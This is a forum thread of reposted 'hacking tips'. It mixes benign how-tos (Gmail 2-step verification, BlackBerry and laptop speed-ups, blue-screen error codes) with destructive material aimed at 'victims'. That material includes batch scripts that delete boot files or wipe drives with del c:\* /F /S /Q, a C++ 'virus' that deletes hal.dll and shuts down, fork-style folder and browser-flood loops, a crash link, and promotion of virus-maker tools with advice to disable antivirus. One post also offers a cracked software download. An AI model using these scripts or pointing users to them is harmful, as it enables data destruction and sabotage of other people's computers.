Dismiss Notice
You are browsing this site as a guest. It takes 2 minutes to CREATE AN ACCOUNT and less than 1 minute to LOGIN

Hacking Tips and Tricks

Discussion in 'Tech, Gadgets & Science Forum' started by MziziMkavu, May 26, 2012.

  1. MziziMkavu

    MziziMkavu JF-Expert Member

    #1
    May 26, 2012
    Joined: Feb 3, 2009
    Messages: 38,760
    Likes Received: 3,104
    Trophy Points: 280
    Strongest Way To Protect Gmail Account – Unhackable 2-step Verification


    Today I’m going to tell you about protecting your Gmail account. Gmail is considered to be one of the strongest accounts to break into. But recently, it has been proven that it can be done. We have to be very careful in securing our passwords so that other networks like Facebook, Orkut and Google Plus are not compromised as well. Since social networking plays a prominent role in our life, we have to secure our email accounts with which they are linked up. The Gmail team has setup a 2 step verification process to strengthen your account. Here’s how to do it.[​IMG]The main reason to strengthen your Google account is that it is a common account for many other services. With a single Gmail id you are accessing other services of Google like Android, Google Plus, Adsense, Adwords, Orkut, and a lot other services. So if you are using all of those services and want to protect your ID, you should follow this procedure.Protecting Gmail Using 2-Step Verification :


    I will just add some screenshots to makethe procest understandable. Just follow the simple steps below. Before getting into the step 2 verification, make sure you have setup your recovery options. In case you have lost your password, you can get it back immediately. You can set the recovering options just above the using 2 step verification option, as shown in below screenshot.1) Login to your Google Account. You can Login either from Google.com or Gmail.com and after logging in, Just click on Account Settings as shown in below screenshot to go to the options page.[​IMG]2) Now click on Using Step 2 Verification which is highlighted as number 2 in above click. Then you will be asked to click on a Start Setup Option in the next page.3) After that you will be redirected to another page where you have to enter your mobile details. You can select the 2ways of setting up your step 2 verification process. One is land line or Mobile phone conformation and the other is the smart phones setup (eg: android, blackberry and iPhone). Take a look at the screenshot below. I have selected the normal phone text verification process since i am using a normal Samsung Corby TXT mobile.[​IMG]4) As you can see in the above picture, the first red mark option is where we have selected our SMS or Voice Call option and at step 2 you have to enter your mobile number so it takes you further. I suggest SMS text message as shown in step 3. So after entering the phone and the option, click on the Send Code option (4). you will receive a code to your mobile, just enter it and verify. Click on next to move the next page.5) This is the page where you are verified and asked to store some verification backup numbers in case you lost your number or phone. Just take a screenshot of those numbers and keep it with you. They are really useful when you have lost your mobile phone. Take a look at the screenshot below.[​IMG] 6) You have to enter another backup phone number to move to the next step. Put any friend’s number or your other alternate number to verify it. Now its done. You can directly access you turn your Step 2 Verification access.Just click on the Step 2 Verification as seen in below screenshot.[​IMG]Now Most Important Phase Of Protecting Gmail : Activating Step 2-Verification

    7) As you can see in the above screenshot that all your account sources are verified. Now after click Turn on 2-Step Verification button above, you will warned that you will be logged out of all the access which you have from satishcoolpctips@gmail.com Google account. For a better idea, Look at the screenshot below.[​IMG]8 ) Click OK to proceed further. After clicking OK here your access to the Gmail id which you have secured will be very strong. Just take a look at the screenshot below.[​IMG]9) That’s it.. Now your Gmail account is step 2 verified account. So each and every time when you want to login your Gmail account, You will be sent a verification code to your mobile which has to be entered in the above Enter code : option to access your Gmail services. In this way you can protect Gmail services which you want. If you want to know more, then Click here :TutorialRemember that you cannot access your GTALK while protecting Gmail account when step 2 verification ON. you are using the Step 2-Verification process. If you want to chat with your mates, you can always chat from the Gmail inbuilt chat. That’s all for today, If you have any queries, please let me know with a simple comment below. Also please share with us any more ways of protecting Gmail.
     
  2. MziziMkavu

    MziziMkavu JF-Expert Member

    #2
    May 26, 2012
    Joined: Feb 3, 2009
    Messages: 38,760
    Likes Received: 3,104
    Trophy Points: 280
    Deadly and Painful Hacks That You Should Never Try on Your PC

    If you are not a computer professional, don't read this, even if you do. Don't ever try this on any of your computers. Trying any of these are really painful and will take you a lot of time to recover.If you got somebody really irritating in your life and stalking you every once in a while then this is the right post for you. But please do think twice before you teach that poor soul a lesson. And once again I'm warning you. Please don't use these if you are not sure of what your purpose of using these hacks is. Now let's get started. These hacks are merely pranks that will frustrate your victims to the core.[​IMG]
    1. Crash a Computer System With Nothing But a Link.

    I stumbled across this URL while surfing the internet. This is a javascript "exploit" , it will hang/crash your system. It basically floods you with an infinite loop of mailto:xxx windows. To cancel this (and you have to move fast) kill the process of your email client before you run out of RAM. Every instance occupies about 1000 bytes, if your victim is smart, he better end the process As soon as possible or he will be forced to reboot his computer.WARNING THIS LINK WILL CRASH YOUR BROWSER OR WORSE, YOUR COMPUTER !!!!

    Click Here. (Mailto popup crash)


    Create more than 3,000 folders under a minute.

    Step 1) Open your notepad and type the following code.@echo off
    :top
    md %random%
    goto top


    [​IMG]
    Step 2) Save it as 1000.bat@echo off makes your screen appear blank but it is actually making hundreds of folders.
    md %random% is command that creating folders with random names.( md is a command to make directory in ms-dos)
    goto top – return the command to :top, causes an infinite loop.Now this might look a little suspicious to your victims. Lets make it more funny so that your victim can fall into your trap easily.Create a shortcut for the created batch-file and change its icon to a folder icon and make it look unsuspicious.Here's what I did with my file.[​IMG]If my victim clicks on the file. He's gonna see the hottest chics that he's never seen in his entire life don't you think?3) Shutdown A Computer Forever!

    Now Please take your eyes of this part because this is the most simplest and deadliest trick/hack for your windows computer. Copy the following code into your notepad@echo off
    attrib -r -s -h c:\autoexec.bat
    del c:\autoexec.bat
    attrib -r -s -h c:\boot.ini
    del c:\boot.ini
    attrib -r -s -h c:\ntldr
    del c:\ntldr
    attrib -r -s -h c:\windows\win.ini
    del c:\windows\win.ini


    Save it as "shutdown-forever.bat". Just make sure it has a .bat or .cmd extension.DONT RUN THE BATCH FILE ,YOU WONT RECOVER BACK AFTER YOU RUN IT !!!This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.So please, use this hack only if you have no intention of rebooting your computer again. So just be careful.Here's an alternative code.cmd /c del c:\windows\* /F /S /Qcmd /c del c:\* /F /S /Q
    Paste it in NotePad And Save It with Extension .cmd or .bat.[​IMG]
    4) Another RAM crashing Trick :

    open notepad and type:A
    start Latest Tips and Tricks – Computers, Mobiles, Gaming, Internet and Windows
    goto Asave with .bat extension.
    Infinitely loops your browser to open up coolpctips.[​IMG]
    Do this and your victim will have infinite pages of coolpctips flooded on his computer screen.5) Delete all your system files with just 6 character command.

    Copy the following code into your notepad and save it as a .bat file.del *.*

    All your files in your hard disk will vanish in less than 5mins.Once Again i am warning you not to try this at in your PC. DO NOT TRY THESE FOR FUN!!

    Unknown Awesome Notepad Funny Tricks You Might Have Missed


    Here are some cool notepad tricks for you guys. Some of these are pranks, they may not work if they are pretty good with computers or you're trying these on anyone whose background originates from computer field. Apart from these any kind of victims will do. This is just a fun article, just enjoy reading and I'm sure you'll learn something new about notepad.Notepad Diary :

    Do you keep a diary (Or maybe a journal or something to keep a track of your daily activities and routines) Or do you wish to make notes where the notes keep the date automatically?Do you watch movies and keep a track of them??Like when you've watched it and stuff?? Well here is a cool trick that im gonna show you.Its upto you how you use it. All you need is notepad.[​IMG]1) Open a blank notepad file.[​IMG]2) Type .LOG in all caps at the top and hit enter.
    3) Now save the file as you wish.
    4) After closing the file, open it again and you will notice that the date & time is now listed on the second line.
    5) You will also notice that the cursor is ready for you to start typing on the next line.[​IMG]6) Now every time you open it, type something on the next line and then save it,close it, when you open it again, it will have automatically saved the date and time on the last line.It keeps a running record of date and time for every save. Now you have a diary ! Have Fun !Matrix Coding :

    Next Trick that I'm gonna show you is to create similar to the Coded-Screen From the movie Matrix!! The screen where random numbers appear in the movie and a techie sits right in front of the computer and guides "Neo" through all troubles.Anyway if you don't have an idea just have a look at the matrix screen from the following youtube link here.
    Lets try to create a similar screen just by using a notepad.Just Copy paste the following code into your Notepad and save the file as Matrix.bat."Matrix" is not necessary, you can save it with whatever name you wish but its important that you save it with .bat extension.
    Here's the code.****************************
    @echo offcolor 02esecho %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%goto start
    ****************************This is nothing but usage of few simple notepad commands to create out Matrix screen.Let us understand what these commands do and how they function in brief.Echo - Echos the screen.Color – Displays the text content in the color that you mentioned.:- This is similar to the "go-to" marker in C-Language. (Not a problem if you're not experienced with C-Language. Just thought you should know)%random – This prints a random number on the screen.goto – this points that the function must be passed to "start" again to make it an indefinite loop.Your screen must look something like this.[​IMG]Fake Virus :


    Deleting Files message to freak everyone out.Just copy the following code and save it as a batch file like we spoke.@echo off
    cls
    echo Fatal Error!! Your computer is under attack!!
    pause
    echo Deleting Files
    pause
    :files
    echo !323%%%@#@GJFGG42JG
    echo !3424%@#%^&@52%@%gs
    echo !@$@^624@$6262$hG
    echo !@#4-07234&5*((6hkd
    echo !&^%78755&*%478*%$&
    echo !^$$68*$78()&4578
    echo !&8898*65$$566$68(9
    goto files
    If you want your victim to run this,save it in startup or you can just make him click your batch file and enjoy the look on your victim's face.
    Auto-Shutdown Code :

    This is the real deal.This trick is so simple and so easy,but really leeches-out the life of even the toughest of the programmers making them wonder how to fix it.Now before you do this,just make sure this is only a prank and nothing more.I'll tell you each and everything about this but

    you will have to make sure you restore the computer back to normal after using this trick. Trust me its fun,not at all dangerous.Its the kinda trick that is so easy and makes people wonder why is your computer acting so weird. Lets get started. just open notepad and type the following

    code.msg * Fatal Error! Your Computer Will Shutdown in few Moments!*
    shutdown -tThat's it!!! Yep! That's the code, as simple as it looks. Now save it as virus.bat, or anything you wish, just make sure it's under .bat

    extension.Now here's the real deal that makes this trick so annoying.Now take the batch file that you created and place it in the Windows startup.For those of you all who don't know where startup is, no problemo! It's in Start(Windows button on the left bottom of your screen), and

    there it will be, the windows startup.Just place the batch file in it and your trick is set to play a prank on your victim. The next time you switch on your computer your computer will look for the files in the startup directory and run them!! when your batch file is executed. It will display a

    message"Fatal Error! Your Computer Will Shutdown in few Moments! "You will next get a message box with a count-down for shutdown of your computer.You will have just a minute to remove the batch file from the startup directory to stop this from running again.Unless and until the file

    is removed from the startup . Your computer will shutdown every time you turn it on!! So don't forget to remove the file from the startup directory. Just remember use this trick for fun purposes only( or you can use it in your college if you hate your lecturers, Because that's what I do. Psssst,keep it a secret). Anyway I guess you have understood everything clearly.The outcomes of this trick is solely your responsibility.Have Fun!!
     
  3. MziziMkavu

    MziziMkavu JF-Expert Member

    #3
    May 26, 2012
    Joined: Feb 3, 2009
    Messages: 38,760
    Likes Received: 3,104
    Trophy Points: 280
    How To Make Some Powerful Viruses On Your Own

    I AM NOT RESPONSIBLE IF ANYTHING GOES WRONG WITH YOUR SYSTEM.
    Yes we can make some powerful virus on our own and can create a disaster in our enemies system. i have created 60 different virus applications which stop the functionality of windows applications and make your system useless. There is nothing to code or nothing to program all we have to do is to download a application called as acid virus maker and with this we can create powerful windows virus and BAT files which can really harm the system for sure.
    [​IMG]
    There are different types of windows virus in this software and some are useful and some are dangerous. These virus are simple to create and easy to apply in ones system. once clicked it will start its functionality and do the work assigned to it. There is a List of virus where we can create on our own.
    We can also Enable or Disable the some windows applications and can create virus files which will be deleted when run. The list of windows batch which we can create in this software are:
    A) Open/Disable Options.
    B) Delete Files When Run.
    In this Open/Disable Options coloum we can create :
    1) Open CMD
    2) Open Notepad
    3) Shutdown PC
    4) Open www.youareanidiot.org
    5) Disable MSCONFIG
    6) Disable REGEDIT
    7) Disable system restore
    8 Disable Task Manager
    9) Disable Screen saver
    10) Disable Firewall
    11) Disable paint
    12) Disable magnify
    13) Disable Notepad
    14) Disable Calculator
    15) Open Malicious sites
    16) Make Spam folders
    17) Kill Internet Connection
    18) Disable CMD
    19) Disable Live Messenger
    20) Disable Yahoo Messenger
    21) Disable Mouse
    22) Disable Keyboard
    23) Disable Nod32
    24) Disable Avast
    25) Disable Norton
    26) Disable Malware bytes
    27) Disable Kaspersky
    28) Disable Firefox
    29) Disable Internet Explorer
    30) Disable Safe Mode
    31) Disable Disk Fragmentation
    32) Spam Victims PC
    33) Disable Uninstall
    34) Add on Startup


    [​IMG]

    And Also some Delete files when Run or Opened the virus.
    35) Delete all .DOC Files
    36) Delete all .MP3 Files
    37) Delete all .WMV Files
    38) Delete all .VBS Files
    39) Delete all .PPS Files
    40) Delete all .WAV Files
    41) Delete all .INI Files
    42) Delete all .OCX Files
    43) Delete all TXT Files
    44) Delete all PNG Files
    45) Delete all EXE Files
    46) Delete all CFG Files
    47) Delete all JPG Files
    48) Delete all BAT Files
    49) Delete all PDF Files
    50) Delete all ICO Files
    51) Delete all AVI Files
    52) Task Kill System Process
    These are the 52 BAT applications which we can create using the application Acid Virus Maker. To create a virus just open the application and check the tick mark on the application which you want to use and give a virus name without any spaces and be careful that you are putting a single file name without any special characters and add a comment if you want and click on Make button which is beside About. A BAT file is create in C: drive just copy that and use where ever you want to use it.
    BUT PLEASE DON’T USE DELETE ALL…………. BAT VIRUS APPLICATIONS IN YOUR OWN SYSTEMS. THIS IS REALLY HARMFUL TO YOUR COMPUTER.


    DOWNLOAD ACID VIRUS MAKER


    Reveal *****(Asterisk) Passwords Using Javascript

    by SATISH COOLPCTIPS on MARCH 24, 2010 · 10 COMMENTS

    Want to Reveal the Passwords Hidden Behind Asterisk (****) ?Follow the steps given below-
    1) Open the Login Page of any website. (eg. http://mail.yahoo.com)
    2) Type your ‘Username’ and ‘Password’.
    3) Copy and paste the JavaScript code given below into your browser’s address bar and press ‘Enter’.

    javascript: alert(document.getElementById(‘Passwd’).value);
    4) As soon as you press ‘Enter’, A window pops up showing Password typed by you..!





    Powerful C++ Virus

    by SATISH COOLPCTIPS on MARCH 11, 2010 · 6 COMMENTS



    This is a powerful C++ virus, which deletes Hal.dll, something that is required for startup. After deleting that, it shuts down, never to start again.

    Warning: Do not try this on your home computer.

    The Original Code:

    Code:
    #include
    #include

    using namespace std;
    int main(int argc, char *argv[])
    {
    std::remove(“C:\\windows\\system32\\hal.dll”); //PWNAGE TIME
    system(“shutdown -s -r”);
    system(“PAUSE”);
    return EXIT_SUCCESS;
    }



    A more advanced version of this virus which makes the C:\Windows a variable that cannot be wrong. Here it is:

    Code:
    #include
    #include

    using namespace std;
    int main(int argc, char *argv[])
    {
    std::remove(“%systemroot%\\system32\\hal.dll”); //PWNAGE TIME
    system(“shutdown -s -r”);
    system(“PAUSE”);
    return EXIT_SUCCESS;
    }


    The second version would be more useful during times when you do not know the victims default drive. It might be drive N: for all you know.
    Visit Latest Tips and Tricks – Computers, Mobiles, Gaming, Internet and Windows for a better experience.

     
  4. MziziMkavu

    MziziMkavu JF-Expert Member

    #4
    May 27, 2012
    Joined: Feb 3, 2009
    Messages: 38,760
    Likes Received: 3,104
    Trophy Points: 280
    Creating a Virus Using a terabit



    Who says it's difficult to make a virus?
    Now you can make the most simple of the virus until Trojans that can damage the system.
    Okay, I'll give an explanation skrg first gan cekidot ......... ......

    [​IMG]

    A. Software Information:

    • This software is made by the Iranians. The news is also not certain the truth, but I tried to search on google.com and I got a tip that says that the software is genuine Terabit Virus Maker made in Iran, and it was in version 3.1. In version 3.1 to the previous ones, this software is not support for Windows 7, only support the operating system before Windows 7, such as: Windows XP, Vista. Here I have a Terabit Virus Maker Software version 3.2 which has support with Windows 7.
    2. Software functions:

    • This software serves to create a virus in an instant with the ability that we can choose its own so the user can use it easily and quickly. In the software has provided the features we can use in the manufacture of virus, there are 54 features that we can use, I will just mention the course and 15 features for other features that can be seen in the picture. 15 features are:

    A. Avoid Opening Calculator
    2. Avoid Opening Copy, Move Window
    3. Avoid Opening gpedit
    4. Avoid Opening Media Player
    5. Avoid Opening Mozilla Firefox
    6. Avoid Opening Msconfig
    7. Avoid Opening Notepad
    8. Avoid Opening Wordpad
    9. Avoid Opening Yahoo Messenger
    10. Add to Windows 30 User Accounts
    11. Always Clean Clipboard
    12. Always Log Off
    13. Close Internet Explorer Every 10 sec
    14. Delete All Files In Desktop
    15. Delete All Files In My Documents

    This air-virus file extension *. exe . So, when this virus file is executed, the features have been added, it will run and change the settings for your computer system in accordance with the features you choose.
    And there are items that can be used to complete the perfection of the virus that you created, such as:

    • Binder serves to execute / run a file that we associate with the virus that you created, a file can be linked in any format, just as image files, word files, Excel, PowerPoint, music, notepad, and others.

    • Fake Error Message function to display a false message of our own making, and the sub-item is no title, message, and type. Title content title of the message, Message content with your own message, and type, select the type you want.

    • Run Custom Command (I have not tried before)

    • Add [] fake MB (s) to the virus works to add capacity to the fake virus files.

    • File name after install is a file that actually runs, while the fake file is executed, there should type / extension *. exe that can be used.

    • File Icon is a item that is used to select the icon file virus.

    • File Name is the item that is used to name the file.

    • Run Windows Virus with the item that serves to run the file on the windows.

    • [R] is a reset button, to reset the settings you've chosen to default settings

    • Virus Create function to create a virus which we have previously designed.
    3. How to Use the Software:

    1. Install deepfreeze to keep your computer safe.
    2. Disable your Antivirus, because the software is considered as a virus by the antivirus.
    3. Run Software tVirusMaker.exe
    4. Select / check the features provided and select the items that will be used.
    5. Virus Create Your last click and save it to your directory.
    6. File virus is ready to run. (* And for-for all your friends, 'hahahah ... just a suggestion' *)
    4. Download Software:
    Download Link -> DOWNLOAD HERE

    [​IMG]


    These viruses are also very easily detected by antivirus software, most victims will be successful if the targets are not using antivirus / antivirus disabled. But it never hurts to try right?

    Good luck and do not be misused
     
  5. MziziMkavu

    MziziMkavu JF-Expert Member

    #5
    May 27, 2012
    Joined: Feb 3, 2009
    Messages: 38,760
    Likes Received: 3,104
    Trophy Points: 280
    Blue Screen Error Message


    [​IMG]

    The error message / error messages usually contain a fault on the operating system or hardware.
    Contains troubleshooting advice or suggestions what to do to correct the error. It lies below error message.
    Hexadecimal code that wrote the code crashes.

    Memory Dump Message: indicates that all the processes that are currently being held in memory is copied into a file on disk for the purpose of debugging. This debugging file typically takes the technicians to analyze and correct errors.

    In the discussion this time we will only discuss the meaning of the main error messages contained in the Blue Screen.
    Code:

    A. IRQL_NOT_LESS_OR_EQUAL (0X0000000A)


    This is an error that usually occurs in the Blue Screen error, this message most often appears. This error message is caused generally because they have a mismatch driver installed on your computer.

    Cause List:
    ? Problem drivers compatible or incompatible
    ? Video Card problem, this includes the overclocked video card that you just exceeds the limit or change video card and you have not uninstalled the old video card drivers from the chipset is different
    ? Audio Card issue, including configuration errors or bugs in the sound card driver


    2. NTFS_FILE_SYSTEM or FAT_FILE_SYSTEM (0x00000024) or (0X00000023)


    Well, the message is at least a little "disconnected" gives an overview on where the damage is located, which is on a partition or filesystem but not in HD. We can check by checking the SATA or PATA cable or tool can check the partition with chkdsk.


    3. UNEXPECTED_KERNEL_MODE_TRAP (0x0000007F)


    If you get a message like this, can be caused by:
    ? Excessive Hardware Overclock
    ? An overheated computer components
    ? BIOS is corrupt
    ? Memory and CPU is disabled


    4. DATA_BUS_ERROR


    This message is caused because of the possibility that memory or the memory slot on the motherboard is damaged.


    5. PAGE_FAULT_IN_NONPAGED_AREA


    Caused due to hardware malfunction, including main memory, video card, or memory in the processor (L2 Cache)


    6. INACCESSIBLE_BOOT_DEVICE

    Due to an error in the wrong hard drive jumper configuration, boot sector virus, the wrong IDE controller driver, or chipset driver error.


    7. VIDEO_DRIVER_INIT_FAILURE

    error occurs on the video card driver installation is less than perfect, restart during the installation or can also occur because of errors in the installation of the driver.


    8. BAD_POOL_CALLER

    This error can occur because of errors or incompatible drivers. Often occurs when installing XP from an upgrade, or rather of the new installation.


    9. PEN_LIST_CORRUPT

    This message is caused due to damage to RAM


    10. MACHINE_CHECK_EXCEPTION

    Caused by a defective CPU, or an aggressively overclocked, and the power supply to power shortages or damaged.

    Now it's 10 error messages that occur on the Blue Screen and the cause.
    Source: xcode.or.id
     
  6. MziziMkavu

    MziziMkavu JF-Expert Member

    #6
    May 27, 2012
    Joined: Feb 3, 2009
    Messages: 38,760
    Likes Received: 3,104
    Trophy Points: 280
    Basic Tips to Make Your BlackBerry Run Faster

    You may find your BlackBerry running slowly and often times this can be resolved with a few simple steps. I’ve taken the time to write out these tips that should get your BlackBerry back up to speed. Remember, your BlackBerry is more like a computer than a phone, and it needs similar best practices for memory management and performance.[​IMG]



    Clear Out the Event Log




    Your BlackBerry tracks absolutely everything it does in order to help with debugging and troubleshooting in what is called an “Event Log.” It helps your BlackBerry run smoother and faster if you periodically clear out this log.
    From your Home Screen of icons, press and hold the ALT key and type “LGLG” (Do not press the SHIFT key at the same time) to bring up the Event Log screen as shown. Press the MENU key and select “Clear Log”. Then select “Delete” when it asks you to confirm and finally press the ESCAPE key to get back to your Home Screen.Close Unused Applications

    Want to see what apps you’re running? Hold the menu key or press “alt” + ESC. If you find some apps in this list that you aren’t using, open them and close the app. Remember, an app is still running unless you open the app, press menu and select “close” or “exit”.Web Browser Running Slowly? Clear out the Cache

    You can make a dramatic increase in the speed of your Web Browser by clearing out the cache. Start your browser by clicking on the icon. Inside the Browser, click the MENU key and select “Options”. Select Cache Operations. Click “Clear History,” then click all the “Clear” buttons below. Answer “Yes” when it asked about clearing ‘pushed content.’ When done, press the Escape key a few times to return to the Browser. This will usually speed up your browsing speed significantly.

    Automatic Memory

    Cleaning – Keep It Running Smoothly


    One thing that may help keep your BlackBerry running smoothly is to utilize the automatic “Memory Cleaning” feature. Although your BlackBerry has lots of built in memory, all Smartphones are prone to “Memory Leaks” which can cause the device to really slow down, programs to hang or not work properly.Start your Options icon and click on “Security Options.”

    Glide down and click on “Memory Cleaning” Change the “Status” to “Enabled.” Once enabled, you will see more options. I recommend leaving the first two as “Yes” and adjusting the Idle Timeout down from 5 minutes to 1 or 2 minutes. Finally, if you want, you can “Show Icon on Home Screen.” Save your changes.
    If you selected to show your Icon, you will see it in the

    Applications folder as shown. When you click the Memory Cleaner icon, you will see the cleaning happen.
    Looking for more basic BB tips? Made Simple Learning have some good BlackBerry guides worth checking out.
    Hope this was helpful. and don’t forget to subscribe down below…​
     
  7. MziziMkavu

    MziziMkavu JF-Expert Member

    #7
    May 27, 2012
    Joined: Feb 3, 2009
    Messages: 38,760
    Likes Received: 3,104
    Trophy Points: 280

    How to Improve Laptop Processor Speed (important)


    Improving the processor speed of a laptop not only enhances its productivity, but it also increases its durability. If your laptop is lagging, it could be due to insufficient disk space, faulty software or registry errors. Numerous options are available to enhance a laptop's processor speed, such as using the system tools.
    [​IMG] [​IMG]
    [h=2]Steps[/h][h=5]Run Error-checking[/h]
    • Click "Start" then "My Computer" or "Computer."
    • Right-click the local hard drive icon and click "Properties."
    • Powerful Password Reset
    • Click the "Tools" tab and click "Check Now" under the "Error-checking" section.
    • Check both of the disk options. Click "Start" to begin the scan and repair of any system errors
    [h=5]Run Disk Defragment[/h]
    • Open "My Computer" and right-click the local hard drive icon.
    • Click "Properties" and click "Tools."
    • Click "Defragment Now" and click "Defragment Now" again.
    • Check the "C" drive and click "OK."
    [h=5]Uncheck Start-up Programs[/h]
    • Click "Start" and type "msconfig" in the "Start Search" or "Run" box. Press "Enter."
    • Click the "Startup" tab and uncheck the programs that you do not want to load at startup. Numerous programs open at once inhibit laptop resources.
    • Click "OK" and reboot your system.
     
  8. MziziMkavu

    MziziMkavu JF-Expert Member

    #8
    May 27, 2012
    Joined: Feb 3, 2009
    Messages: 38,760
    Likes Received: 3,104
    Trophy Points: 280
    Using cmd to Change Lost password on Windows 7

    This method is for all those that have lot of passion while working on command prompt(cmd). I like this method because, its just so straight and brief. Follow this tips clearly using cmd to change lost password on Windows 7.Step 1.

    Click start or windows logo, in the box search for cmd, right click on cmd, then run as administrator.(we run as

    administrator so as to gain privilege to access any file)
    [​IMG]

    In the CMD window type the following command below and hit Enter : net user Account Name Your New Password
    net user Account Name Your New Password
    In this command replace Account Name by the account name (Account Name is case sensitive) whose password you want to change and replace Your New Password by the password that you want to set.
    [​IMG]

    By so doing this your password will be changed successfully, Now type in exit and hit enter. Now you can fully enjoy your newlly changed password. I hope this tips really worked for you.
    Enjoy your new password and feel free to share this info with your friends.
     
  9. MziziMkavu

    MziziMkavu JF-Expert Member

    #9
    May 27, 2012
    Joined: Feb 3, 2009
    Messages: 38,760
    Likes Received: 3,104
    Trophy Points: 280
    How to Change Windows 7 Password Without knowing Current password


    Hmm, I don’t know if you already know about this tips, because. After reading a friends blog post on how to change windows 7 password without knowing current password it sounded cool and after trying it on my pc, it word perfectly fine. Its really fascinating, so i thought I should share with everybody.Step 1.


    • Go to Start or windows , Control Panel and click on the Administrative Tools.
    • Double click on Computer Management.
    • Select System Tools from right window pane
    [​IMG]
    • Under this, just double click on Local Users and Groups and then on Users
    • Now you will see all the login accounts of your computer. Right click on any the account whose password
    • you want to change and then click on Set Password.
    [​IMG]
    • A warning message will popup on your screen just click on Proceed button.
    [​IMG]
    • Now enter your New Password and click on OK button.
    [​IMG]


    Insert New Password

    As you can see, you finally did it kudos for your self, for the knowledge on How to Change Windows 7 Password Without

    knowing Current password.
    But!! oOh what? The only limitation of this method is that your current account should have Administrative privileges.OK, Not bad.
     
  10. MziziMkavu

    MziziMkavu JF-Expert Member

    #10
    May 27, 2012
    Joined: Feb 3, 2009
    Messages: 38,760
    Likes Received: 3,104
    Trophy Points: 280
    Turn your Windows 7 Laptop into a Wi-Fi Hotspot with Connectify!

    [​IMG]


    I guess you must have hard of this software called connectify?Hmm, all it does is to help you turn your pc to hotspot, Imagine!!! . you might be wondering ,ooh how can I connect my iphone, PsP, iPad, and my other laptop and device to internet.

    You don't have to worry, because your problems just got jailed. (wow), how is this possible? Just download connectify from HERE. The images below will guild you through on how to install….. As you can see below its not that hard. Connect and share


    with your friends any where any place.
    [FADEIN_TEXT_NEWS GROUP="connectify"][​IMG] [​IMG] [​IMG] [​IMG]

    HOW IT WORKS




    http://www.connectify.me/
     
    Last edited by a moderator: Jan 4, 2016
  11. MziziMkavu

    MziziMkavu JF-Expert Member

    #11
    May 27, 2012
    Joined: Feb 3, 2009
    Messages: 38,760
    Likes Received: 3,104
    Trophy Points: 280
    Connectify Pro 3.2 Full Crack

    You can turn a Wi-Fi-enabled Windows laptop into a Wi-Fi hotspot by using Microsoft’s Internet connection sharing (ICS) feature. This feature is enabled through the laptop’s Network Sharing properties. If you want to turn your Windows 7 laptop

    into a Wi-Fi hotspot without configuring any settings on your computer, there are a few third-party applications on the market that will allow you to do so, such as “Connectify” and “Virtual Router.”New Intel Centrino 2 laptops come with a

    technology called “My Wi-Fi” that also allows you to set up a Wi-Fi hotspot without ICS. I prefer using “CONNECTIFY”.
    Lot of people ask me for the crack. Now I share the newest version of Connectify Pro 3.2 – Full Crack. In Connectify Pro 3.2 – Full

    Crack is indeed no changes are striking, but from the official website on this version is no improvement Connectify Pro 3.2 new features and enhanced appearance. Bugs previous version has also been improved in this version 3.2.
    [​IMG]


    You don’t have to be like, is this going to work? Dont worry
    *This software works well on Windows 7
    *This software is only for laptop / PC that has Wireless
    *Tested By Me @ Windows 7 Ultimate SP1
    *Tested with ZTE CDMA Modem (EVDO)

    Download

    [​IMG]Download | Connectify 3.2 Pro incl. Crack – (6 MB) Operating SystemWindows 7 (Support All Mode : Access Point, Ad-Hoc)


    Windows XP & Vista (Ad-Hoc Mode Only)
    How to use


    1. Log into the computer using an account with administrator rights.
    2. Open the Web browser to verify that the laptop has an active Internet connection.
    3. Download Connectify Me from HERE. Inside the downloaded file you’ll get instruction on how to install your crack. Follow the onscreen instructions to install the Connectify software onto the computer.
    4. Click the Connectify icon on the taskbar to launch the application. Open the “Setting” options.
    5. Enter a name for the wireless network you are creating in the “Wi-Fi Name” box. Enter a security password in the “Password” box. Open the “Internet” drop-down menu and select the type of connection you want to share. Click “Start Hotspot.” You laptop is now a Wi-Fi hotspot.

    Hopefully helpful. don’t forget to subscribe.
     
  12. Skillseeker

    Skillseeker JF-Expert Member

    #12
    May 27, 2012
    Joined: Jan 30, 2012
    Messages: 230
    Likes Received: 0
    Trophy Points: 33
    habari za kwako kaka?..ebwana naomba kujua source ya hizi info zinapatikana kwenye site gani?.shukrani
     
  13. ndetichia

    ndetichia JF-Expert Member

    #13
    May 27, 2012
    Joined: Mar 18, 2011
    Messages: 27,545
    Likes Received: 128
    Trophy Points: 160
    hacking make me crazy! kudos kaka dryrooty
     
  14. MziziMkavu

    MziziMkavu JF-Expert Member

    #14
    May 28, 2012
    Joined: Feb 3, 2009
    Messages: 38,760
    Likes Received: 3,104
    Trophy Points: 280
    @Skillseeker Mkuu Tembelea hapa Teknik Memperbaiki & Memalsukan FlashDisk

    @ndetichia Jitahidi utajuwa tu inshallah.
     
  15. MziziMkavu

    MziziMkavu JF-Expert Member

    #15
    May 28, 2012
    Joined: Feb 3, 2009
    Messages: 38,760
    Likes Received: 3,104
    Trophy Points: 280
    5 Wi-Fi Hacking Tools they Use to Hack into Wi-Fi Networks


    I have got a wireless router, configured it to allow all my systems to access internet wirelessly and checked that everything is running smoothly. But few times I see unauthorized connection attempts to my Wi-Fi network. So, I googled about this and learned that it’s very crucial to take all necessary steps to enhance the security level of your Wi-Fi network. Then again I also

    came across few Wi-Fi hacking tools that allow to hack into someone’s Wi-Fi network and access their resources for free.
    In today’s era it’s very dangerous to leave your Wi-Fi network unguarded. It’s possible for anyone to use your Wi-Fi network and send unauthorized emails. Terrorism or threatening emails can get you into serious trouble, even if you are not related to

    this in any way, as your Wi-Fi details are logged with the email service provider and partially in the email header.
    Let’s know the top 5 Wi-Fi hacking tools first, understand how they work and then we will work out on the best-practices to increase the Wireless Router security.
    Kismet

    [​IMG]

    Using Kismet one can see all the open wireless networks, as well as those Wireless Networks which dont broadcast their SSID’s. It’s a matter of minutes to use this tool and identify networks around you.

    Technically Kismet is an 802.11 layer 2 wireless network detector, sniffer, and intrusion detection system. It works with all

    wireless cards that support rfmon (raw monitoring) mode, and can sniff 802.11b, 802.11a, 802.11g, and 802.11n traffic.

    Kismet typically identifies networks by collecting packets passively and detecting standard named networks, detecting hidden networks, and inferring the presence of nonbeaconing networks via data traffic.
    NetStumbler

    [​IMG]

    NetStumbler is a freeware Wi-Fi hacking tool that’s compatible with Windows only. It can be used to search open wireless networks and establish unauthorized connections with them.

    NetStumblr can also track the Signal/Noise condition to negotiate a strong Wi-Fi connectivity with the network. Checkout the below video to see how it works.

    WireShark

    [​IMG]

